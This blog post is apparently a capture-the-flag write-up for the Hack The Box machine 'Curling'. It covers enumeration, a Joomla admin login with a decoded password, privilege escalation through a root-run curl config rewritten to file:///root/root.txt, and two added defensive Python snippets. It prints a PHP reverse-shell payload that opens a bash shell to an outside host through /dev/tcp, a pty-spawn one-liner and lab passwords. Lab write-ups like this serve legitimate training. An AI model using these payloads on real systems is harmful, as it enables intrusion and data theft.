30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Curling

As usual I’m starting with a port scan to get a list of open ports and running services.

root@n0w4n:~/htb/curling# nmap -n -T4 -sS -sV -sC -oN portscan -p- 10.10.10.150

For this scan I’m using the flags -T for speed, -sS for a SYN scan (run by default as root, but I’ll specify it nevertheless), -sV for the version of the running service, -sC for a script scan with the Nmap Scripting Engine (NSE), -oN to write the result to a text file and finally -p- for all 65535 TCP ports. UDP I skip by default as it takes a very long time to scan.

Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-15 19:51 CET
Nmap scan report for 10.10.10.150
Host is up (0.026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE   VERSION
22/tcp open  ssh       OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  ssl/http?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.68 seconds

And this is the result of the scan. I omitted the -O flag, which you can use to get an educated guess of the targeted operating system.
The response of the service behind port 80 gives back that the port is open, but nmap can’t determine what kind of service is running behind it.
When I try to direct my browser to it…it tries to connect, but doesn’t get any result.
So I use view-source: and as a result I get the source code of the main page.
At the bottom of the page there is a comment which gets my attention:

</body>
      <!-- secret.txt -->
</html>
Q3VybGluZzIwMTgh

Looks like base64.

root@n0w4n:~# echo "Q3VybGluZzIwMTgh" | base64 -d
Curling2018!

A password maybe? But where?
The site hosts a Joomla CMS, so maybe I should find the default login page.
The only problem I face at the moment is that I thought the loading of the site was normal. But it isn’t!
It just runs a Joomla site and you need to get some information about getting in, and secret.txt is one lead.
But the machine is just damn unstable. When looking at the forum it seems that the site runs fine for other users, but there is a lot of complaining about resetting the machine a lot and changing stuff like index.php…which will ruin it for others (as we all use the same machine).
So I need to suck it up and keep at it. Unfortunately I just ran a dirSearch scan and a joomscan and the box gets reset….again!!!!
This is no fun.
After a few tries it seems that the machine is running fine and the site is loaded properly.
Because I found something that could work as a password, I needed to find a username. Admin and Administrator didn’t work, so when checking the site there was a name: Floris.
This got me in as Super User.
And the machine gets another reset 🙁
I didn’t have much time to get a good look at my options, but it looked like I could edit the articles published on the site.
A next step would be to alter one of the articles and embed a reverse shell php script.
But a quick scan of the webserver shows the index.php is 0 byte. So maybe people are messing with the index.php and then reset the machine if it doesn’t work.
This is annoying.
Now that I know my initial scan was misguided by other hackers messing with the machine I ran a port scan again….and got a different result.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

That’s more like it. So to get a working shell I just need to endure the endless resets on this machine.
After a while the machine seems to be stable and I use the creds to get into the admin console and enumerate the modules.
Because there was nothing useful I installed Simple file upload and after some modifications I was able to upload a working php script that gives me a reverse shell:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.13.45/1337 0>&1'");
?>
root@n0w4n:~/htb/carrier# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.13.45] from (UNKNOWN) [10.10.10.150] 49626
bash: cannot set terminal process group (1158): Inappropriate ioctl for device
bash: no job control in this shell
www-data@curling:/var/www/html/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@curling:/var/www/html/images$

Now to get some better privs.

www-data@curling:/home/floris$ ls -lah
ls -lah
total 48K
drwxr-xr-x 6 floris floris 4.0K Nov 16 12:16 .
drwxr-xr-x 3 root   root   4.0K May 22 18:33 ..
lrwxrwxrwx 1 root   root      9 May 22 19:14 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris 3.7K Apr  4  2018 .bashrc
drwx------ 2 floris floris 4.0K May 22 18:34 .cache
drwx------ 3 floris floris 4.0K May 22 18:34 .gnupg
drwxrwxr-x 3 floris floris 4.0K May 22 18:34 .local
-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile
-rw------- 1 floris floris  853 Nov 16 12:16 .viminfo
drwxr-x--- 2 root   floris 4.0K May 22 19:04 admin-area
-rw-r--r-- 1 floris floris 1.1K May 22 19:17 password_backup
-rw-r----- 1 floris floris   33 May 22 18:56 user.txt

It looks like there is a file called password_backup in the /home/floris folder.
To be safe I’ll copy it to a tmp folder and work from there.

www-data@curling:/tmp/n0w4n$ file password_backup
file password_backup
password_backup: ASCII text
www-data@curling:/tmp/n0w4n$ cat password_backup
cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H

The first bytes of a file can give away its identity. When googling 425a 6839 3141 5926 it showed that this is the typical header of a bz2 file.
The reason why file gave an ASCII file as output was that it was a hexdump of a bz2 file.

www-data@curling:/tmp/n0w4n$ xxd -r password_backup > pwb.bzip2
xxd -r password_backup > pwb.bzip2
www-data@curling:/tmp/n0w4n$ file pwb.bzip2
file pwb.bzip2
pwb.bzip2: bzip2 compressed data, block size = 900k

Now to decompress the file.

www-data@curling:/tmp/n0w4n$ bzip2 -d pwb.bzip2
bzip2 -d pwb.bzip2
bzip2: Can't guess original name for pwb.bzip2 -- using pwb.bzip2.out
www-data@curling:/tmp/n0w4n$ file pwb.bzip2.out
file pwb.bzip2.out
pwb.bzip2.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix

Another compression.

www-data@curling:/tmp/n0w4n$ mv pwb.bzip2.out pwb.gz
mv pwb.bzip2.out pwb.gz
www-data@curling:/tmp/n0w4n$ gunzip pwb.gz
gunzip pwb.gz

gunzip needs .gz as the extension, so I renamed the file first.

www-data@curling:/tmp/n0w4n$ file pwb
file pwb
pwb: bzip2 compressed data, block size = 900k

Another round of compression……getting a bit boring.
After another round of bzip2 decompressing and tar I got a txt file.

www-data@curling:/tmp/n0w4n$ tar xvf pwd.out
tar xvf pwd.out
password.txt
www-data@curling:/tmp/n0w4n$ cat password.txt
cat password.txt
5d<wdCbdZu)|hChXll
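The manual xxd -r / bzip2 / gunzip / tar chain above can be generalised. The following Python example is added here and is not from the original post: it rebuilds the bytes from an xxd-style dump and keeps peeling layers by their magic bytes until plain data remains. It builds its own nested sample, so the member name password.txt and the secret inside are constructed for the demonstration.

```python
import bz2, gzip, io, tarfile

def xxd_reverse(dump: str) -> bytes:
    """Rebuild raw bytes from an xxd hexdump (what `xxd -r` does): the hex groups
    sit between the offset colon and the double space before the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" in line:
            hexpart = line.split(":", 1)[1].split("  ", 1)[0]
            out += bytes.fromhex(hexpart.replace(" ", ""))
    return bytes(out)

def unwrap(data: bytes, max_layers: int = 10):
    """Peel bzip2/gzip/tar layers by magic bytes until plain data remains.
    Returns (payload, layers); layers lists what was removed, outermost first."""
    layers = []
    for _ in range(max_layers):
        if data.startswith(b"BZh"):                          # bzip2: "BZh" + block size
            data, kind = bz2.decompress(data), "bzip2"
        elif data.startswith(b"\x1f\x8b"):                   # gzip magic
            data, kind = gzip.decompress(data), "gzip"
        elif len(data) > 262 and data[257:262] == b"ustar":  # tar magic at offset 257
            with tarfile.open(fileobj=io.BytesIO(data)) as tar:
                member = next(m for m in tar.getmembers() if m.isfile())
                data, kind = tar.extractfile(member).read(), "tar:" + member.name
        else:
            break  # no known container left: this is the payload
        layers.append(kind)
    return data, layers

def build_sample(secret: bytes) -> str:
    """Constructed input: secret -> tar -> bzip2 -> gzip -> bzip2 -> xxd-style dump."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tar.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    lines = []
    for off in range(0, len(blob), 16):
        chunk = blob[off:off + 16]
        hexcol = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        asccol = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexcol}  {asccol}")
    return "\n".join(lines)

if __name__ == "__main__":
    payload, layers = unwrap(xxd_reverse(build_sample(b"example-secret\n")))
    print(layers, payload)  # ['bzip2', 'gzip', 'bzip2', 'tar:password.txt'] b'example-secret\n'
```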

Aaaaaaaand the connection is lost due to another reset. As patient as I am, I wait for another startup just to find out someone had corrupted the index.php. So no login possible.
Man, this is getting really annoying. The machine doesn’t look that difficult, but the many resets and the bungling of some people really make it a challenge. I really don’t like giving up, but I have no idea how long this is going to be fun.
When the machine is reset again and seems to run stable I repeat the previous steps to get a reverse shell and su as floris with the found password.
I got some tty issues, but with python3 -c 'import pty;pty.spawn("/bin/bash");' that was sorted out quickly.

www-data@curling:/home/floris$ su floris
su floris
Password: 5d<wdCbdZu)|hChXll
floris@curling:~$ ls -lah
ls -lah
total 52K
drwxr-xr-x 7 floris floris 4.0K Nov 16 12:31 .
drwxr-xr-x 3 root   root   4.0K May 22 18:33 ..
drwxr-x--- 2 root   floris 4.0K May 22 19:04 admin-area
lrwxrwxrwx 1 root   root      9 May 22 19:14 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris 3.7K Apr  4  2018 .bashrc
drwx------ 2 floris floris 4.0K May 22 18:34 .cache
drwx------ 3 floris floris 4.0K May 22 18:34 .gnupg
drwxrwxr-x 3 floris floris 4.0K May 22 18:34 .local
-rw-r--r-- 1 floris floris 1.1K May 22 19:17 password_backup
-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile
drwxrwxr-x 3 floris floris 4.0K Nov 16 12:32 .scan
-rw-r----- 1 floris floris   33 May 22 18:56 user.txt
-rw------- 1 floris floris  853 Nov 16 12:16 .viminfo
floris@curling:~$ cat user.txt
cat user.txt
65dd1df0713b40d88ead98cf11b8530b

Finally….the first hash.
In the home folder there is a folder called admin-area, which is a bit of a give-away.
Inside there are 2 files: input and report, which are owned by root but can be managed by floris.
The input file has a variable which points to the localhost webserver. The report file is an HTTP representation of that input.

floris@curling:~/admin-area$ cat input
cat input
url = "http://127.0.0.1"
floris@curling:~/admin-area$ file report
file report
report: HTML document, UTF-8 Unicode text, with very long lines, with CRLF, CR, LF line terminators

Let’s try and point the input var to a more interesting file.

floris@curling:~/admin-area$ ls -lah
ls -lah
total 16K
drwxr-x--- 2 root   floris 4.0K May 22 19:04 .
drwxr-xr-x 6 floris floris 4.0K May 22 19:18 ..
-rw-rw---- 1 root   floris   30 Nov 16 14:43 input
-rw-rw---- 1 root   floris  293 Nov 16 14:43 report
floris@curling:~/admin-area$ echo 'url = "file:///root/root.txt"' > input
echo 'url = "file:///root/root.txt"' > input
floris@curling:~/admin-area$ echo "" report
echo "" report
 report
floris@curling:~/admin-area$ echo "" > report
echo "" > report
floris@curling:~/admin-area$ ls -lah
ls -lah
total 16K
drwxr-x--- 2 root   floris 4.0K May 22 19:04 .
drwxr-xr-x 6 floris floris 4.0K May 22 19:18 ..
-rw-rw---- 1 root   floris   30 Nov 16 14:44 input
-rw-rw---- 1 root   floris    1 Nov 16 14:44 report
floris@curling:~/admin-area$ cat input
cat input
url = "file:///root/root.txt"
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:46 UTC 2018
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:52 UTC 2018
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:56 UTC 2018
floris@curling:~/admin-area$ date
date
Fri Nov 16 14:44:59 UTC 2018
floris@curling:~/admin-area$ ls -lah
ls -lah
total 16K
drwxr-x--- 2 root   floris 4.0K May 22 19:04 .
drwxr-xr-x 6 floris floris 4.0K May 22 19:18 ..
-rw-rw---- 1 root   floris   30 Nov 16 14:44 input
-rw-rw---- 1 root   floris   33 Nov 16 14:45 report
floris@curling:~/admin-area$ cat report
cat report
82c198ab6fc5365fdc6da2ee5c26064a

And there we have it. The root flag.
Can’t say I really liked this machine, but that was mostly because of the many resets.
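The admin-area trick works because a privileged job trusts a user-writable config file. As an added example (not part of the original post), the Python check below parses the curl-style url directive from such a file and refuses anything that is not plain http/https to the loopback host; it assumes, since the page does not say so, that the job hands input to curl as a config file, and the two sample inputs are constructed from the transcript.

```python
from urllib.parse import urlsplit

# Assumption (not stated on the page): a privileged job feeds the `input`
# file to curl as a config file, so its `url = "..."` line decides what gets read.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"127.0.0.1", "localhost", "::1"}

def parse_config_url(text: str):
    """Return the value of the first `url = "..."` directive, or None if absent.
    Handles the curl config spellings `url = "x"`, `url="x"` and `url = x`."""
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip() == "url":
            return value.strip().strip('"')
    return None

def check_input_file(text: str):
    """Decide whether the config only fetches from the local web server.
    Returns (ok, reason) so the caller can log why a job was refused."""
    url = parse_config_url(text)
    if url is None:
        return False, "no url directive found"
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme or '(none)'!r} not allowed"
    if parts.hostname not in ALLOWED_HOSTS:
        return False, f"host {parts.hostname!r} not allowed"
    return True, "ok"

# Constructed samples: the original content of `input`, and the edited one from the writeup.
ORIGINAL_INPUT = 'url = "http://127.0.0.1"\n'
EDITED_INPUT = 'url = "file:///root/root.txt"\n'

if __name__ == "__main__":
    for sample in (ORIGINAL_INPUT, EDITED_INPUT):
        print(repr(sample.strip()), "->", check_input_file(sample))
```

The real fix is not to let an unprivileged group write the job's config at all; the check is a second line of defence that also gives a log line when someone tries.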